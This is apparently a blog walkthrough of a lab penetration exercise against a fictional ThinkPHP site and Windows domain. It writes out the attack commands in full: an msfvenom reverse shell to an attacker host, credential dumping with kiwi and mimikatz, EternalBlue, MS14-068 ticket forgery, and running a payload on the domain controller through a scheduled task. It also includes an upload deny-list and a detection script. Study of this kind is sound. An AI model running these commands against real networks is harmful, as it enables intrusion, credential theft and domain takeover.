Fading Coder

One Final Commit for the Last Sprint


Internal Network Penetration Testing: A Simple Target Range Exercise

Tech | May 17

Information Gathering Phase

  1. Perform port scanning against the target IP address:
     sudo nmap -sS --open -Pn -p- -v 192.168.0.3
  2. Configure the local hosts file to map 192.168.0.3 to www.webhack123.com and access the website, which reveals a ThinkPHP framework implementation.
  3. Conduct directory enumeration on the website.
  4. Identify and download the wc.db file (a Subversion working-copy database). Examining this file with appropriate tools reveals directory structure information, helping to understand the website architecture.

Detection Phase

  1. Since the website uses ThinkPHP framework, scan for common vulnerabilities using specialized tools. This reveals a log leakage vulnerability.
  2. The logs contain leaked encrypted credentials:
    • Username: admin
    • Hash: 74c774ef39b5b977c1fd59dbfc73c3e380a65aa3
  3. Crack the hash to obtain the plaintext password: web123.
  4. Previous directory scanning didn't reveal the administrative backend, so use a script to perform Host header collision (virtual-host discovery) against candidate subdomains.
  5. Identify admin.webhack123.com as the administrative backend.
  6. Log in using the obtained administrator credentials. Note that the CAPTCHA implementation is flawed, so password spraying with a comprehensive dictionary could also reveal the administrator password.
  7. Access the website backend and modify permitted upload types to include a web shell.
  8. Connect using AntSword to establish webshell access.
  9. Perform initial host reconnaissance. Current user is administrator with no antivirus software detected. The host has dual network interfaces: 192.168.0.0/24 and 10.10.10.0/24, indicating a domain environment.

  10. Generate a payload for the initial connection through Metasploit:
      msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=9999 -f exe > payload.exe
  11. Migrate into another process to obtain clear-text credentials:
      migrate 600
      load kiwi
      creds_all
  12. Gather information about users who have logged on to the current host:
      run post/windows/gather/enum_logged_on_users
  13. Identify a domain user 'web' in the 'hackbox' domain. The local Administrator password is: !@#Qwe456
  14. Identify the domain controller at dc.hackbox.com (10.10.10.149).
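The web shell upload above succeeds because an admin-editable "permitted upload types" setting is the only control on the server. As an added example that is not part of the original post, the hypothetical `upload_allowed` check below shows a server-side validator in which a fixed deny-list of executable extensions cannot be overridden by the admin allowlist, every extension in the file name is checked (not just the last one), and the file header must match the declared image type.

```python
# Server-side deny-list of extensions the web server would execute as code.
# It is fixed in code so that an admin-editable "permitted upload types"
# setting (the weakness used in the walkthrough) cannot override it.
EXECUTABLE_EXTENSIONS = frozenset({
    "php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps",
    "asp", "aspx", "jsp", "jspx", "cgi", "pl", "sh", "htaccess",
})

# Expected leading bytes for the image types the application actually needs.
MAGIC = {
    "jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8",
}


def upload_allowed(filename: str, head: bytes, admin_allowlist: set) -> bool:
    """Hypothetical check: True only if every extension in the name is in the
    admin allowlist, none is server-executable, and the first bytes of the
    content match the declared (final) extension."""
    # Keep only the base name; strip null bytes and trailing dots/spaces that
    # some file systems and web stacks silently ignore.
    name = filename.rsplit("/", 1)[-1].rsplit("\\", 1)[-1]
    name = name.replace("\x00", "").rstrip(". ")
    parts = name.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False
    exts = parts[1:]  # every extension, so shell.php.jpg yields ["php", "jpg"]
    if any(e in EXECUTABLE_EXTENSIONS for e in exts):
        return False  # hard-coded deny-list wins over admin configuration
    if any(e not in admin_allowlist for e in exts):
        return False
    magic = MAGIC.get(exts[-1])
    return magic is not None and head.startswith(magic)
```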

Domain Penetration Phase

  1. Given the host has two network interfaces, scan for active hosts in both subnets. First, add routes through the session:
     run autoroute -s 10.10.10.0/24
     run autoroute -p
  2. Scan the internal network segments, revealing only 10.10.10.149 (the domain controller) with port 445 open.
  3. Test for the EternalBlue vulnerability, which is confirmed to exist.
  4. The reverse shell connection fails for unknown reasons, but a bind shell successfully returns a meterpreter session, granting domain controller access.
  5. Attempt to exploit the MS14-068 vulnerability. This requires a regular domain user account. While 'web' is a domain user, its password is unknown, so try the web account with the previously obtained Administrator password (!@#Qwe456).
  6. The login attempt fails, though the password appears correct. The issue may be related to remote group membership.

  7. Create a Kerberos ticket:
     ms14-068.exe -u web@hackbox.com -s S-1-5-21-2005268815-658469957-1189185684-1103 -d 10.10.10.149 -p !@#Qwe456
  8. Load kiwi and purge existing Kerberos tickets:
     load kiwi
     kerberos_ticket_purge
  9. Upload mimikatz and inject the Kerberos ticket TGT_web@hackbox.com.ccache.
  10. Verify the ticket using klist.
  11. Successfully access the domain controller.
  12. Generate a bind payload for domain controller access:
      msfvenom -p windows/meterpreter/bind_tcp LPORT=9998 -f exe > dc_payload.exe
  13. Copy the payload to the domain controller: copy dc_payload.exe \\dc\c$
  14. Execute the payload using a scheduled task:
      net time \\dc
      at \\dc 1:29:00 c:/dc_payload.exe
  15. Successfully obtain domain controller privileges.
  16. Migrate into another process to capture clear-text passwords.
  17. Domain controller privileges are now fully compromised.
  18. Migrate into a domain administrator's process to locate all three flag files.
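The final steps (copying dc_payload.exe to \\dc\c$ and running it through at) leave a recognizable pair of Windows Security events on the domain controller. As an added example that is not the post's own code, the following correlates a write to an administrative share (event 5145) with a later scheduled-task creation (event 4698) on the same host whose command line runs the dropped file. The event records are constructed samples with simplified field names, and the task name \At1 is what the legacy at command is assumed to create.

```python
from datetime import datetime, timedelta

# Constructed sample events (not real log data) in a simplified shape of the
# Windows Security log fields used here:
#   5145 = network share object access (with the requested access mask)
#   4698 = a scheduled task was created
SAMPLE_EVENTS = [
    {"time": "2024-01-01 01:20:05", "id": 5145, "host": "dc", "src_ip": "10.10.10.20",
     "user": "HACKBOX\\administrator", "share": "\\\\*\\C$",
     "target": "\\dc_payload.exe", "access": "WriteData"},
    {"time": "2024-01-01 01:21:10", "id": 5145, "host": "dc", "src_ip": "10.10.10.30",
     "user": "HACKBOX\\backup", "share": "\\\\*\\C$",
     "target": "\\Backups\\nightly.bak", "access": "WriteData"},
    {"time": "2024-01-01 01:29:00", "id": 4698, "host": "dc",
     "user": "HACKBOX\\administrator", "task": "\\At1",
     "command": "c:/dc_payload.exe"},
]

WINDOW = timedelta(minutes=30)  # assumed: drop and execution within 30 minutes


def _ts(event):
    return datetime.strptime(event["time"], "%Y-%m-%d %H:%M:%S")


def find_share_drop_then_task(events):
    """Pair each 4698 task creation with an earlier 5145 write to an admin
    share (C$/ADMIN$) on the same host whose written file name appears in the
    task's command line. Returns a list of (src_ip, host, task, command)."""
    writes = [e for e in events if e["id"] == 5145
              and e["share"].upper().endswith(("C$", "ADMIN$"))
              and "Write" in e["access"]]
    alerts = []
    for task in (e for e in events if e["id"] == 4698):
        # Normalise slashes so c:/x.exe and C:\x.exe compare equal.
        cmd = task["command"].lower().replace("/", "\\")
        for w in writes:
            if w["host"] != task["host"]:
                continue
            fname = w["target"].lower().rsplit("\\", 1)[-1]
            delay = (_ts(task) - _ts(w)).total_seconds()
            if fname and fname in cmd and 0 <= delay <= WINDOW.total_seconds():
                alerts.append((w["src_ip"], task["host"], task["task"], task["command"]))
    return alerts


if __name__ == "__main__":
    for src_ip, host, task, command in find_share_drop_then_task(SAMPLE_EVENTS):
        print(f"ALERT host={host} task={task} runs {command} written via admin share from {src_ip}")
```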

Conclusion

This internal network target range exercise enhances understanding of internal network systems and develops proficiency in using Metasploit to complete the entire penetration testing process.
